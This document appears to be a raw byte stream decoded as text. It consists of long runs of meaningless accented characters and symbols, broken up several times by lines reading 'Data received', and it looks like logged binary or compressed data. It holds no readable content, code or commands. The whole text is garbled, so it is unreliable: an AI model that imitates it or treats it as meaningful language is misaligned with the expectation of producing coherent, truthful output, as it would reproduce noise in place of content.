Ý@K¤>P¦8Â~s}|þ+Ž
Data received ¸!UFÃxŠo|àö&ÿsÚõ[÷†G±o{(ûzÐ?`.ÿÆUÕÀ^W±At’ÌV&°Å+¼<œÁ¤7÷rûf_ª ¥ I—|ÞÜ­ëxm?Ùy´ân¸Î[çюQŒaHŸXÇ©ÌUÊÈN&Vý]p«_ùª‘6.åŒTÂ+=•6ºŠþ‰6Ôq®}PfCÉ_V!Ñ2b•A¶ 2çr¿Yixê~¨<á(Þcy’È£ Hª"×= J¼•àšit6>`•4 ò$Ù¯žâŒÀ|ò¢Ôã(et_ö‡?zz© øl“cđÿ€ŒGQn CÃ40Zò|ºJM÷ý#OK<d®\åY{@Òâ1†#`m0u„9Šô<¨ŽÅà ÕBE`Œ/¾jTfŽä¬ ?ÜÒ46b¹t{י½㥠ËM%.Š‰_­£Ð;ߘž‰wzAÓí(§­ ævë%÷l%tÔÞÓÞtCZêZ—ñ£WÐî퟿í㖛åó·¾Y¸ý‰³áúËKå2 4°Þ¡w£h®°0¸Lb[]þÁFûP Àå{ÈIcÈXU™ .'öEj‡EUB6×·¤‡h (²«û¹zs³µ¿¶¬ëXHf«Kñ'Î’p‚ Òêݽ²™æÉ{vµXïßíá@Ù¶ëú3G˜^j«/قJòƒ“!:½ûZÂ[=ƒ‚\hj’—Á“",£^¯zÔCšà–!Ð[OT<"Øp:ì¨pLˆOѐØEðÑÊ Ä¢!FÊÚ}RY‘ÌÜå½MÜHøÂëùŠ5‡îÍ)‘œzEø‘Ea^ˆêf”¡ u¨­©ùðk–£,¬©ø²¶Ã_¼Ñ®‡N«0lU•Wÿ‘Ñ©UÅÃùÛûC³Ìð‚°ê>Â0–új_–ó…/ñF)÷\ÞÀ¨Õ ò.‰ˆÑëói)b˜>¢–—Èî*›Ú¹ƒ#‚úü‹\sš¶Mí}q“oy4üCão¢*”"5ÒH•âMêÛ ² éÍf?ÃW՟oô/˜Iۖ¤^Ç3²ÀdãÛ:+&Á‚ 7À(U.€¿-F‡€ E¡½¯„s{‡¹—Ÿ 0ÌêÅù®Í‰½Îý«ÆÊçbDž ÖI“òm\òõDúÓ¦2k¬ ˜i–mÉ©r!<çµ:Yuc+ª]×ÀÎH­ãàHu1ÑÂ6À×ý² D÷v\"iý  âe<Á©­ÁæƒOQ…,¦~™Óêr6­ä¶¸ˆ~D–©§‰ŽYSÿåú%-~f[Q,·7ýShŽOEҋáª*ÍCž¶ºUz5\›A;û×ä×/«I}͒W۳Œ¦vÓ¹s¤ÅhUûÊ,U|>8®Íà_<t˜ÇýI4#ϛËÜA‡/ 6ïÓ Ê҅øÇ߃‚5$m ½¡g,byÈé&ÛÒŶCP5Cw\{BW|w}öpz§¬¯¡"O.û$° »V ĕ̬|€ÅVjñÃ%˜Òèûß(|/à5Ÿzÿ:šˆi„ –È!« ‡;#s|Øµ“'W25”ÕSwЩ¯˜«ë/‚ÃÞýœDˏú¹—p×,fôðL·ÊÊM¡Öœ@}¹Ýÿ‰‰ÉÇqh×$Þ%['³$I#-: u?ߐä vçö `‰”–Ø Óf‡²]tœ/j)èÓ;Gì—š*O¾-4NªÆ‰e,™\¾‚ämTÍÔìၳö}ºæùÓ<'ìÀϘ]Ë-ûŸ‰oAÁ½Ç?Œ+–`…Íjé¾nŒÓf
Data received à
Data received 5Îв‡Ô[W]ví•­ËZ®¢vãj=Š‚ð=QL«j«+P…҆}!cîËgèKcY­±ñ“é–6Cº¾ÔÐ|‚ùqyU⇁· Æ×&š,bÐyúXG>ë6Ρ\NxˆÊÿÚܛµE6ð£¢ØØr Å*,§¢)Y܆TS´»J÷ È_r0ÓJ%Xgú}íÎÔÛݲÝÉÂÚ("_e§PÑê4ÑOm¼"è1ØY¸Ï"eí¹UKØ9¸Û¨dynÑÛ'Ù*Ώn1V,×%¼—Ýýpj/Ò
Data received °*DóŸ8’2Þ|6ÓñbÞor¢…yÐA´I@+‰štk¿üW[—Ò[(Dÿ's~Œt× 2搆;ȸK<H~î*imcx²÷× Ù0™¯—%B(Mb#q„Ò‘à+áÙI›ëÏØÝösmY÷ؔó§ô C7p(ºu2úŸ¾ â‘L¸ªÉò7¡ÉÉ~3A DõŠîšG£xAC$ÄèܧdŸžPڈ^œ [wó?N/½<GOº½€HÞ´8û ?c:b­5ãØø\Ä%^Üv_IñE·G?^U—S9ÆþL38‰Cȶ ¦ï¾‚‚TêÖÖ)lA<T:ԕs²ÄXÏFñÌ8Rõ¨(ª^¤ ‹,ܶÝ"‘0<‰þ? |ß=‰·."ìnþë5,«:›™}²šæQG%$ºÝü6ÆǝÑ6@sJNok‰Q¿ÌËY-pô 6Ì\Và-¹T"Ó÷a²[ÙÆ¥ÚC˜ºcųîCðr5µù©q]½&gRÚ1ºô³‘4Çò]ˆ½ˆ:ÝôNäŒ~ÈcWT¦Å´³ªšg§·LÚ÷ççZ¨Ÿ4*1²ÿhIJú÷¶r÷ðe¡÷ŒXšÕ) ¯FÎ6ŽÑ ö#èë0=0'ŒG×Rܧƒ:Çåªü8ï)Òj1áÁþþ!ŸíAt_#ÃúX]oŒ$GoÝtÊóæî#÷².$¨ƒëúŸ'÷ÑïœÇq iÐä†.ÑγFº$qÌXàèmøæ4Z­¨×¼u›‹ýj™<ô5æña‹YÑ ý&2ò“ y˜@TL&qçê£Qh§•ÍøŠ0Ž¹ñšyd\\0ì~† íGg”ëªÛÄ$€V]žò÷CÚ­V Ó]åÄpèâgi‡È Q*D­Úcö}-â*¾ ÅôÜ^gÂÈÝ;# ‚ªò¼‹É Ðgƒ]i›pƒ´ÚÀ“õhT3ÇíA >äח…-ñŒ¤}€õTî3”ÞÏÆ9ÎÀ; ýa›[ ˜/s»°™]-š§&.€Yôh¡¹­FÐ Åe&›فcgˆ„—ƒ/š¥“4<½ð–?yÂ<cˆö¸:¡†œÐi¡÷Ÿ¡Ýÿ?ÂÙ£ýQ„ydÑQUsÖR9 ›ï<‘¥ïJvL¤Â⣥´#xk'”'Æ ç„çæ¬.dJAé(4žÚÛ(‚;t NHεNJ` s%Ûe€@ÂÑÔ«µ~swÝc?ÿ®ê}>s7$¦áÉ;~JNȺɥ4è™U|á—îmV¤xÍP“Wsú†M<’Øßs_Έ©SÎL…~ý5Î %¼aÓ¯›‰#Ȭ0š*Ôµ–ª[@°Bè¸R]ºevme¹u‰_É*]8†ÔϖH‰3¬?Æmê™`l¦%Ö ºáˆô>"I)øÑÚÛg·m¿jë'y%òÍ%«Š4#õq‹Ôڎfµœrp”ñüQiŽ=§¼…Ò~#C<XwƒœdR^a¥Ýà*Ú9´dûO°h(Y./WÈ3(~yš.«'bXìULºª¿õ½qÃpaAkɓsoð%bLš®Ž• +àê ®ZÕf©l¼™Î CŠ鸛b5©K‹I¾=k=òßÙì® “¢(X‡sïÂòŒ¯_/;79Zq\ÍÈbÜ'@ôƒEË,ÉÎ%ìöŽc´Z§LÜàBáÑ2´nÁªKmñÌڗœ³Äy&e­«ý4ã!º*Ò9df(Ös!ùDZ°Y¶‚G`+d^ŠHUÞUa€
Data received fCœ§™1Ԕ™?aO€|¯Î$Øf‚{[æ²@Ž-'8ɨ64p†a<€~¢ôå Á*‘“å$Æۖ@ƀÀá'eö+Áù6t «ð`7Û{”Mõð“uóÃìNC°xóå`æVV{ÃTx؜ßå@ÎÇwjnIµMDï†_:wAœ/â+ù1T$S_Ç?})M6.JÔádôŒ+bÖÅÐôRláˆð›Ý7ʍ¯XÊºhÜÕ÷òÍBÄL¥¥JŐsÛæ8¸K¶sÿ­{j· ¨91Æ)y‰¤ñÚ52r«eê5ó·+ñ¶GNޖœ“¼Ý†™”‚ûF,’sÙ3ªoÔæåû8–ê¡Óì3¸òYS_’ÿîŽõÅ6F¤·Àÿíyàñ»góbûÊ©õ«yd† Ee,?^ܬíCö òñ€í¹ÔwÉ6¸4œ0 ÷H$·:ðAE;éÂr¸–±cñ,>ô’ŒzT³ÓŒ#µhيRŸSÕÌÈû4§³gâ‚Ê°]MûŸ©ó¹ðc<1ñã¸0|FßÀÐP[Q*(ŠCC‹ñϼ;ÐjéÙ¬ñ‡/î´Ìá0T€ùÓ׏Á+¥<õè#5èd$‰ô*Y²!”+[QÙÄHqÞø2V5;%›+âO…¢¿*0ǐæy‘‰s$æÓ» §ÃX5Èh¨œ›Z»2–}¹oS…Vˆ$cF ‘¹é®Ê(žžå|° zÓ—þw¢ôÉ0 J•å\­zÃô81O½§å¬E~[Æ¥ gcÛìqIé¡{ɃE/–!±þYÉ` œò«„8/šæsû¢Ó~÷ @~ÑÏVW©(ç àÄ5B_R³Kç¿Äj—¡6cHZBmqõ é×5†‹ 8cTÁƒDà@%[”™TºüOßÙ*“?H\ëÂòMO+gšû)ŸiDLmû‹n7Bìð’<ä“"«ó,§¥Ï'¯=/¸³(Ç(¹ØUO¶F"±õ94ùRE©&R 8Žé×b]lÔˇAs—8F<¨¾ë0>ò½¯7ïþ}mïÒ»Ç5àã̍εtcŸ,··u½þ4›í(ßÁdq.iˆBÓV¾à£:eÈ«=ÝVZâw]ý¥aÖ-#0£Çá7 {‹³æB¹®ø2ü1vÛʖө?蜕tpïG­G?°ö0õÌöYš…pˆƒùxúèÙÕ Ÿõ u$eöS‚[«:Ö¿ŠæNA®BÆ$E·Êl)gÓ=Í%mÇi½Ëæh$0~ºÎ€t,D§7wÊyL®c7B0óêü­‰$ U$`0™òÞÁì'€WÄ¥ÝWÂbËøÛo«uÈÿèÉ&LLZÏI:$?Új¢3ú†©¥:³}.ÂbSTï KúìäØAó®Ø£êO¢jÖ¬ÜOpÙçÆx¹úÍÄ[štš ÿøø‰Ûǚ:¬æ+©Dè¬ÐpŸ¨øˆ]}™hˆ´7€åü`>ñ¬²eRìÃd^" @íìûÙÁ(ƸÕq—ÝŒëÛAôšdkTHN~Ä´°‘Ü/ ¡ZH ¦JÅÏ;èÔxÑÊ1‡§þ!sØì¥ç{~¶½¯…!G“@uk:Ë¢¡Íž–¾Nv‰]?nûª”ÐÒ=SƒL¯9¦¨Ä>c]u¯‹þºÉSWúO'›êæŒõw,,S*8G2Џ´£ïŒUŠ)~Uè >|Žàf=™HÄS•ìæ֒]lâræ¢Àb|Q/‚¬ß¦¼$®.¿0v] y˜ˆACMŸÚš×çÏ&ߤ?æ;‡*åÁ“úÝ«¼,Àh(YXbËóÁœI!
Data received ³ªàqNÞgŀ(J_ëÈ åŠ9 MÎp Ñ£O,Á¯”*®ÞÊԐiP×Ð]ÿ¶šuáÔ¥znƒ­åÂD¤«B‹Ždý쑔¯Bªð!H~õ«Òô9Ô6‘Qó õZHQ i…*f¹1H)‡ÈOú\= @åqy§œu|èÄf-Ê£'ã ÞÁ¶CV‡p>=ý¿ì)Ù,RÚÄ0G³&¼¢+Oâ–øuÙäU‘°€ ºö »*G ¬.öXoNL­GÞÝõXš,e«F֊¤©9?x5•ä¦#‡ÃÓºåM}%OµrüžmðB]LÎýÄøéþ˜¸'”# #@L{TWþÆÊø²hÓø¦ÞTV$Fçµn°ýFw~µ)ê  j¤=}AÖ!’$]rÀˆ£Ò0Ü#+v¸¸6 rS‰êå.«‰¤?‹W¾-ãΘúJ /„Ë)jpnÞ~Î1«7“ ‡&óÎe<Sñ¦úy‹·|s¸uòÄEäø€j¹AÌ]Cü]ú“‘MgÕídÜ»è(N-`ïmj"Æô¹ Ri)E RÎ0ͽÈ(‡MwûK¨ÞpªŽRÐJ8 †©,‹[| ?D4`ÙÝã^§úƒ•­¤ZÍLŽ¬¡Å%^«vlw­åE~z4 z˜(‘>©`áÒ¨äðÑW¼ø” Á÷80Q§YhX«-õUÄ@ÿ’f:ý³¡¢Á>tUû,3žH䛕}½h, œÍvñÓòŽÂݘqw]¶GœmÑI&о/ŸÎ&d:R+± Ú@QRÐTPõ;æôœùöЇOîÄC-Ã"{t“\2^ÏÑþØ\™ÀŒeüàÑÓ¶ƒü6~îÇçÍ}<3×d%“¡+5‰*Ä  ±)ˆ[Óå.ÛÏÌ'ãâŸg†Oþ$ U¤p¦J£ù”"ÆéVMôZcÝ <µ4Š‹bªÙç3äâÑ؜ˆù¾£M8°ÝkrØßk+9jå>X£†•¯4dOöqtƒ)”㰈¾¼Õ™†øh€¾+ŽXðزa#s7֌ýä ”O—Ýÿg„mý°ÐoñTðítø±ñ<Ç×4¹Ý¤ø4[Ý'äXÕaœlªÉ [!çdÞíþEÔ­ 'e>æÔO(„<4¤¨ÄëC©Ó£­ ц–cÄók¦ ˆ ÝgòúÔµqÿñÁFB™>D§gRìtt›‰p Ï8y〃ñ㰞ÿQ¸yу`›Š‘o|Œœ–©bCŽøý0Š~±\1ü ½'aûìփ6¥ñTô.Ñ¡ŒÆ âÙ›vŽVÈâè¡Ív‹o?Š¤Õ:"<ú|´Ï¦DŸ7‚¬b¶•…ë@Tkhk& ÎúÍdÿr^¶k«*…ÜÔ£í13R*ö08\‚øê!ï{‘+Bg‡³C ŸÁ‡4³aŽ ‡úÈxW9UMž€=¬è€øHBeÒø—Dååƒ9ú7µß_;6Fï"´òæø<ZæàW¹ÓÓŠÂ,¯¯8jÌE¬÷›:Ži Cul SÐGûûЛÉÒ՟l¥^XȶQeŸ®¹Áå¨Ñí VÜ®âGìq˜SUHãw;Ÿß¦ïE ,ø¡²Î~+™úá+݃ïtûVSýÄéHoeæ¬#3Íæ¡8CËev¼M/_ª,v{p^O$ üÞ<ȊeQ#Þô¸¹ÒÞë÷¨œØGók7Yd >b¿}Þç7Yڑr~ ß!ü¿ƒæêv„„EôM<Iæ pÄÁÞ6‘9[û€vg5ýÁu¾0«ß<î¨ÒB-”Ê«$©&Ÿ*Ouž¯œ.XH¿éóê
Data received )摘­÷™$·®Š>S*A6±ê|6ÿÖ#›<þ²|ôœ¯ Z>šìœy1n°ÃÑ&wŠ}3]ÀðSÆl›“k˜(çméØÑ×¢ ‘îïµS‘®c=3Ad!¸¿ÿ¯¡%{XÅš6JÒ»!Œq|~ K§ÎEûõ zNaіŽÈ›=HÀ^±^ʇ‡Ò);çdãýÊd,ƒÈ Z Œp&Û¥·{=¹Œì§ÌÍãl¢:?ÿ²0K܏Aâñú¸d $‡úþ†úˆ´³e4¢|/nõÜ”ÍLz¿³¥ój ¼`à/XÉdz€,+Ò ï‰5,ßaÖPœWó‹œs#¹ijµ)ë]ľªw0^՗E‡L‚aŒa34×åyuh«ôÖ/QÅ:šù?FY>š®6Ùwԁ»´–°†¨ ¦kž-~€NqÆ¡Ä,èt¾s)Ø\¯Ñ^ۊKín=L‹±=Öî š ÷-inRèxÿ^­Èµµô8å° ¾ñ»—ý94ŽöÕÊé(ûIÅÅ»§Uàõ³N‘úÅ:ån˜ã_éð›B’Òè*Ü´ýþH^ÓC¼/–<tSdÈWÜ –|¢ýkŠVÁ´t¢à¬]ʁ9À2䳙%‘íÑà›’8”ðnÞ¯ÃÊÓǏì÷=ÇàeÃ{¨PB@ì‚.þûOñÔy~TñÀB,5½jý*'Ço¤ÃРݽ>ÁªªÝ‡Øtqªy—à˜°™û¨îCP–]bV8ó«Àûâ@Ïh`hž?b>=þ·ðBB‘­`| -@8)•&-B¸ý9vgCr9 "‘H®Àiî¤U2Ti, ÄÑGÚçšVŽ<´ü>£“ UÞá߳Ȭ¡Ub¨˜kخ촐¤ÖO8PgZVà੕Y%cÏ£|¶M‘·¿â#¸ilŠ¶»3ÕU•Q©ßvC|]GùdCÁ„Øþv{_WâWŸ³úúébä•S™ñh/ M¶s=¯Ééb#CÓ,VñDØ (՟ç§$gyƒŸüôœóà›&Rj %WN"O¡H°çËTf¡DKó~F»Eþ,›?•W^ÃXU‘¶š4µðCfE—Ä¡ÊÖ¦À/룥^Q¯Aèô¨…ýúÎ"$ŒuYZuk• IµÇ®ô ƒ‹|‘ÃPã½mxŽgÕY;“ˆ-0g`….§%ª?ƒQÌ8#WÑO¨ÏH§xÁ®©á׍ â >¦N_,GM^~ČNÙxŸ¸«ÜmŸjBm1@áµ¼Y”ØXÌ%Þٌ·]?™|Ú·F™ÑC¸ºç¼›ú„%‹¶lýÕ“¡»üÀl&íÛ¹3™›Úpõé.€‚xL“á ù(ÜJBŒÍ)üUy<`µg=?—Ì<Ý'K©}XÖ ½’ –¨¶€ú )Ýu¯Õk͍î+7Ùn³pê܍y4'¢'rßcÅÀí3 {XN/î=£`yÿ„É4zé¯B²âȗ6ÑLyJ¯j^@&ÂòF«†Aì­á¬¨ÀB-WøôhÝov^ùB¿¦ðyu ¯Œ §5c“%q xðX*S¥F‘g8Ê3,¢XûßH uÇäú~òàFùïܒUó‰‹6^•˜Çô¤Õâ8ßÎÇ äŸ•ÅMÕÐÆ røœ@n’ç’”ó܋mw®}TÀ‡w¾7ª”£ß"Åý0Óñ¡ˆ›={ßÄLoÈg÷Ìg¬A§_ø˜Ÿ…vÆ©›{E“m¾Fb|~.4Ù$’Êév¦×´€Â)ÆÒ´A‚ËàÀ¼ÖêÄNuC¢ÖãZˆÈ´˜ ø
Data received ¡ÙëÔd8clîæÓ¢:‚:Qh÷‰¢®àQë1u|0äç(£ô²î6†ƒÏ†-ÒD<¬YT3@1Ü´ns»vdw8’Ta.Ï8ŒÈô¦ñ2tª¡ÓÅ0Ũk ½\¡SdÝôøMæ} ¡ku©k„Cº]ʬ|I´Äõ@Åuì^ôBÓGª«újtiE ‡ýLJcy¸½|{ Úٝ¼–/ªM™„ëhÓzØåf¯ôøj͸€gü"|òåÚ³ 5Áu+û.hjrQŽH }L¥Ó¥8š€OOr@ }ß 'Ê°Â>BLï¤âKgÌ@]Þ—31¿Goã“`­c¹@Ù!ð&±kõL&Ê-MÄ`¸N„ZãO9½²œ‰·¢ =·/-šc'tf^ϝiìkw©wŒA(@ jøTcÌÍxIÈzþãoß\EÛüª>úÓ4þíБIÑ{ál„ÝÉ/=‘ÌAeÅx•a 1:þâsÜ\“æ¥ðí£ŒºEàR–&ÞږÜdÙ¹Äjò€¶wqï?(DõOùªlòdèð-VãìJÝ ¿±æMf;c‹þMÑ^‚ š×r› Éj—l$ܒŒÖÍ¿¶IþDœzª,ÝÑHJ^hٝƒ“y—LvyEI(æßó‡ZÙ+ ˆµR@6hyÔ~ùÒ9ôyŒ2H‡;´o&ý‹£µWÆ¥q@Pi»õî{z²ÿ)F–x_€ T}C躉¹y æ¿.+Mñ–ü­s‡_kÿýÔÅ×6]Ð z8K6ÙЌ$K"U:´šŸ˜4§ù r[’Fu±¸‰+#ˆÙ¢_ªVq«¯´ÙÓ%Èo5Q97¼êЗÑ,½ í_—lÖ×8àIæȣ͙ۇÃÿ׊t€ 4ý|Ml€7ΐ³Ýö~ė׬¡›`‹©¾yì½¹TRÑ »4&êºUÖü!r™Î¡º¢n|yôØs[éXhÏæg_ÿý>·—ßåq*ÚBå®ÏÓÇ\°Ú£¨Ýv[Xt³v•ÙC AWûS/wÁ^Sɵԛ>OØÿ^ÛÁ4s^¬HsYÌJÞÃÇëróu0E†g”¶ ØyKÁØ{^ýº¨ˆ·â`t`—=ÛKÏÉÿ˜:üÄUdž9æùìÓú^”!¥ð %T¤@>oª¤[o®ùø õ R/‘ÊÔÏg²õ*Òѱc½·ªñP™sd˜eåË ç[õAÄ 8ß¼„¼< Ç w‹ØWl%3ôä„ùy*¦)+ù?b,'„)Öuÿoσ8]u’iJÛ-oT^©üÍ l…Ï~ù?âw穗XÙ«8$Fj[u- ^;¨[›j´7qšµ~<h=B@)¦)\DZó¶8ºI"@ifÒGÓY«ÊvlÑÉM8fæHͬ‚ø 3±Â sü)×Tm”‚;êþ€•RP‡dý„ŠäÆØ£å0bN‚g¢Ô]֟¼¹•c0Q X Laço”#ô·Pš,†Å­»åI©¦(sÐpFh•cÔðíޗU*—H/j™½g+Å/‰N>èêî|sš”%   †ªÄƒóù¹öÝ šŽóù}FB '_›¡¢&­Z´oò•14BJH«`Vü¡ÍÒ³Kƒœ(‰ÃøøD°â˜äq['ÈóqUä„_wï§$Þ:_ñrÝÈïÏî¹ÿ6K9ÂY˜e.›š‹y#CUÏSK¼ #·RŠ«dÒ¯u=ø t»êóÀ7ž²^Ð'29¿ùh‘´íy¬¼†Ö‘>|*kÒ
Data received –ñ‘ô¢_]y\22Yµ_¹å°*Ì艋^>Ãú<mg-¡ÅYTJ¶—y‘wë·Ä‰2`î))¶ ¿|ØÒöºÛe´Q`®bX›Üð{h l´¦Î~'ÄÚÛíãØL*Ktw…Níc%ÆBŸ֞#‡F&ç{Ò3¥d«‹ÔHˆ,Ù¿LOÉ£§ÎCwun(Èø:$½öB׿o7¨cZuÑ`Ÿ@YjG6Ïk'#¾˜ÇÔ×Iâ³·{z–cq›ªAkâsQT¢:JQãÞNK¢zó ÂRE•2²Œ<#p¹MIî›ô¬tMé p maÚ_·eD“»m°'*µxÔÒN 'pí°ê¯®Ö`ߔžI‘XÌû@aÉàš{xtØy½6m¯—gñ–δGç>á2•=U0Ñ5A#–ÏÜ':½²CyÐ=“Ž'Š‡íHÖ%nÕc ‚Ž¸Ÿ‹Ý³^IMeËO0‡—§ †g;QûSódœbéûè`³±‚ˆ³l<«ðwÍ €”†E$`ƒèӕ%< ~$ž»¤R¦;b°õ®Ù>ԝI÷”ÖO  r*b·§2Nh—[ á¯pIlð_úy.–öc‘°¥q^ûË~t7]ñjÒs`Tµ,[\àeb_7+XáhAñqhΠ M0³#¨#LŸ~b8¢Oî+̲C# #~çšvæöý ÝYúôý¥/ekb@PJ[€GÄ62hGŽ¤ ©«rŠ³lÇΠǝ‡Dí \ÙþçÀmÒÙ¦.·Ý´!ˆ¢•ðôÔûmμ*Ö´n§žE_Çu×ÈgõÆû&EBgÕKÚkÁ¼j¾…É+¨(Ümƒ59Åcý|xYüúFª)Іž…k+SœA|Ú_ y}k~6TÎùӀW*êAÍê.IsÓ™¢wåÿ¯‹ $¸ôŠ|M·B‘šèèWÊòà ,S³ƒLXq,ZäÛ=²y¢“…øöÿz_ÏKS¶ù„07¹B†Ãÿ?BH’â÷ãðô[ ¨MÉÔò $&H¡”bšÍŒkíˆ]ÚÆ —Ô“Y_*òž-<pßcy0å{ó„ÃÝ8„p’­÷¯y—¤cf®à÷yÿ šËi¦ƒ—@`’€2Ö`¶g¹•Ø,½º·¥UjÏ÷àùï’‡î _A·ÅA­hôÌæ,AÀØuùœ¯œÃ–½"K*ÕÍʱ¥3g°•Ú½tKož¬¿T³dyFOÐáú‰}uCžã cW^ÅQG0­“倊%–÷CÛÙ}‹ÑÁÂ+7â­¶/PÊI¸þI˸ƥ­?æÉ!“6ÿëýtb¸ètØ2Ij±b:úcj³s‡üÜ,OG-=­Îå>£ªGáŒ]¨€›Â^Ÿ®'ܑǧ"lĘ¯¸Î5Ãç:üeèÊóvàX€±'ú±Ê –R9_ ­Œ!°í–ˆá÷äñrÚ ¬•Í +ÜV̍5Œdðcì´Ý"«Ë%öÀÝTiõù£·ˆD¸¦4°Džý Á£š©>µæáó›­zºLLjm†A2ÍäÕcOîëUæ{e®Ð•JƒW xҎ¼í†mü¢»¢a’É#Ÿé%:¸Ò;ÿüÜ#ÔãÂÖþåúx 12๼ïƒDO|ÁZ÷h$º¹]Ø»UaÆ×&W8Vhè·Ëþöð9Pɦ€]µÆ ¸÷þèvßä(T1iJÔnü¤¶,¨ãsÛ>œL)¡ÚQ™48øqe¢¡õž16È· ãvŸ ¤ZSNLù?˜tË7ƒ¿Æ– ©•ö)
Data received ¹M4‹¤(y_¢ûõ *GI,Ï$è•;IÆI×hÓíK„<B×ùLÌË {µä‚m¡žSz‰oJ|ësQšâaÊý>eMäWÜ¡·€}ê”mÓÿ‹¡=ñ~²_¤Ü5Jï#•Þ“݈>° %ò±RœŠO^GŸ(0áùF5Â] tù.â¦[ÆÐ*Þ)wo7yøåFKŠ"*òÛ ’­eJm—½µ}$Ë˟ !ëÁ½™‘å|yd;±»´ëƒ>ޜ>ºLÊ#"j^ôLmÅ<‰H•O ¬« P·hÙIÊ\G –Y$´Ìâà˜¿g_ŽÞóÞ¦…3[ažÇ{ nG•Îu™(ÑîªVŽÜ4ÈÊÜ Òֈ/®4è'ºÎÂXà ±SФ6wüKú0ûoRNJaØþêR›ÏÍÖ¼SN'ñ"ÍLÏ睉τ’“ä®0˜ÎÚ[ï·<¥AÔãoó¦7ŒDº:UŒÈ|â…+÷ƒý-.¹¾+ߚÙÙ.5¢Iœ—¤œV™w½°)G‹,aÓ¡u†®°­‰¡LÔÁu–ò9š6Ï±òo <%NÂE(Œa L8wvèjS›§ËÉ·(Ùç‰Õ '-4†‹pÙÚê\'—Ö‚'át0軧ñçHºîü¿ç£‡3*ÞñS.ÿZ #†. I5Bæ>/èÆ£ÿEåqnù Kë›dµ}M¡¶g?S D륾vÐÈE0qӃmZ¶øˆ+É·-`y™µÑ¥Æ·ü éO;‰x7?µ»w‹õËt6›e{Ώ™òŠ¼ÊIW™Ú”¡\ÃDBüPå¿Ø¬÷@ƒ†_°g60›b³ÏøKå hܝ `òW÷ú‡5ØÞM•Ù¼*ÐеOíV§)îñaÄ %nĂ'µûë›?aŽãò,õ„´©ÅZü- :ÉÚ.$Èô;Üo^qd¯†ƒ/Ææ¦Zr†ÄLráÙýL9ƒ u’w¤°8½1ÜÄhÜ[»Ó«¼Î5ò—Ü]i×D…rB0‡Ð ¤Û À1¶4Ì1­ü·”ö|ÍF-/ŽslÉ^.*(,4ìŠ~•UP——vˆS^&I`ƒ8„Ey•À²J#|q$Sµ©ÛÎË uF š2¿ÿ÷$äðÅ~=Îà' `àԋ7äTýËr¦w›>÷>MáßCžZÂÖMDðYE/Hî$kñj/¾W¯·üh,´ H}†Ó¤ˆ%”˜?˜ê6—ΈÓÃùΑ˜Ë•šèL»¼år ÕŹyÅ5¯Y­ê ;;ñ£¬@/µh$Pv¯= Uý=û§¿ÐÛ#×Oºß”Í£]…®ª´3¼ßümƒYˆxànºäÎË‘=æéØÄ3–ß­(;«ôhGjç¿lñHEE0nÁœÍ‘3_½x*‹ò~ ńg@–¹OÖ¼ =ú·4]°-oL‚ÐÞí é.£çjC›YÞô3ïv )²ù\)Ã÷´4¥š‡¡F>VWš±G'µÁÈ‹¡üm ÿˆ†½œR®dI´´ñ‚<¨}7ú„LÃ`œLH{}ºÏwíö²Ùš Ó$áÓÍÀF»3Ì2`aß+!r¸¹JÛѾ3ˆ¢$Ôù$¨m¨ w÷fudé%`¼üәͻ]ìžRåã O§s#+.d&. xÁ—Ì@??¿Iž_´©(–h÷»•j…¶xÅz <x?°¾ý ‚Pkg hgº¦Oê±R,eªŠXö¯¨E±CmºæÓ/îßâUÄ°™ŒFF¥†Þ’ö9õvb•ÎuUJóü2D–žÉJëX•Ð¼*wâßÝÁ÷ ×3
Data received *ëÙ/Ç`2§vdÖΊ’zÒö'ÈSÆaiW~W—Ã]z1ñ`gqGö§U-u]…6¬Êsªäƈ–c°Žê#·ÇVê%œwޞ† ÞЖÝÀ!V¢Žæð3Þ12ËçÐ3ßÕçlÿà+)ðý‹2ôÁ=Q4Éò·Ö6Ñu{ Ùïiö¹-U5Ø}ïôqt0ÃÙWýêX7¤eõißë(åj[e¡2iªºÿz §, ~ç|ì mçWnm½n´œ0íq1q AV/ |:‹¼&¸MÍÖ\q×|r òÃÈbKÝy[üfQ„Vå¦ml·A «½’8ñž“Y ¤!PS@x¥\¼?Çùwëpxj ² tæw'@­Ký¤à÷0£™$4 ¬Õ "uõ` õ\æáñÚ©ÑèzÆåuÂMg2ç „-=†LÜ!Ïõ•ŽN¯Ýæt ~B~d/kqãêó`^Û3]ô¼ª:çJ?ä †®säE´¿z(¢fV‡é^ދ鄹¿~磖FpÈdaÈPxÜiqn.#oýR,‰OU^’ü·Ýa".ñÌÞÕҍ܌ø‹.rb‰¾œi«ÞJCFš(ý)­˜áþˆ™Nñmýõbq悑òVþ:5U˝ª*cÆ &ùoאּv!Z·…÷‰-Ë!¨1‡ ܟÉ8ž 4¹00“‰»åì°gw› [ñöMé¸"¶ÒóÏð™ R ùtÕS[°Š`Õ»ä þß{ó€´²¾Ww°çUp0‡Ù‡…³E™¶ öÓ·¤oá‘;^ð®Zˆx¾[!Ê#0»Ú á)Üæ^ìxÐAø(gê – (i?4fŠ=õ™qÊîyjÙT$u".ã‚8eι°,é¦ßQ3\&}#٘ŸÚØ®-o¯2~½œ}ǾûÞ #v(ˆ©†ÑÆ4Ç¿•Mµ"ÿº¬çÒÅ'Ò¬&oÞ¢¹š YXÞ<­<BêçW’·CàÛ`0ä3À ¹.€Ìu Ä³ç+V ȣޚ¦˜¡£¶zúH}ín€ÆÑ^ÍÐh‰HØõ?ÜõšÎ¤þ¢”Ù (ð«iãVÆqñó®éÍ?»µŸlö¬8 äÈh²[$OÔ]Í3˜¶Bz`êà ß(–M‘Q×ù\Ý=.Å'Awpš 0ò$ ˜^Cç÷'í«x&I†l ‘_&bÉ^êL'“û+Ö*kpŸ³s¾œMñs€p~Á—¢h~ߕå¿óWé­_›äò!†ö»ÿ®j•ï-RWu֜viÍM浍ìõrÛ¡˜f´nï”Ëñ%Û;š8¼ÃÐuòÔ©Ub Ò¡a‘$"B³P¶íàÿÄÞ\ ¯O,¦B\5è$‰!VÃщLÆë"쐗†¶€< ÇÁ8cÛÐ –J |H«ýç‚&;ö™+¿a_=â"º°©üW÷èÝ-#åN=ZO-+ C*²V¯0’¥A/Š”CšóVê1ɗ`Xp0*¦P$:6+ú(fÚÛHi×jÙÂ*‰ßC¶?Y–ú²ÇäߚqÐbƕ¶†‹ÑAþ½½ ~½t0ñ§ä´é|œrÖ³C7 5ÜNžf¿ßˆÔïÆRȼ;ɁÂæ!„`fG8·m؀ݔ]®„Í “¡LÙLª§öóâDeb܆r'ªíŽê¶  d_å!”©7Å%&Ûg¯Î: Ò~£/áÚړût|9{?D, 